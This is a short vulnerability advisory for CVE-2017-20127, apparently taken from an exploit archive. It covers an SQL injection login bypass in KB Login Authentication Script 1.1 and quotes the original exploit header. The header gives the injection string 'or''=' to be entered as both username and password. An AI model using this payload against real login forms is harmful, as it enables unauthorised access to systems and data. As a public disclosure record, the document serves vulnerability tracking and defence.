Headline
CVE-2017-20127: Offensive Security’s Exploit Database Archive
A vulnerability was found in KB Login Authentication Script 1.1 and classified as critical. Affected by this issue is some unknown functionality. The manipulation of the argument username/password with the input ‘or’’=’ leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
# # # # #
# Exploit Title: KB Login Authentication Script V1.1 - Authentication Bypass
# Google Dork: N/A
# Date: 26.01.2017
# Vendor Homepage: http://kunals.com/
# Software Download: http://phpscripts.kunals.com/d/item/files/kblogin.rar
# Demo: http://phpscripts.kunals.com/d/item/detail/login/demo/
# Version: 1.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Exploit :
# http://localhost/[PATH]/ and set Username and Password to 'or''=' and hit enter.
# # # # #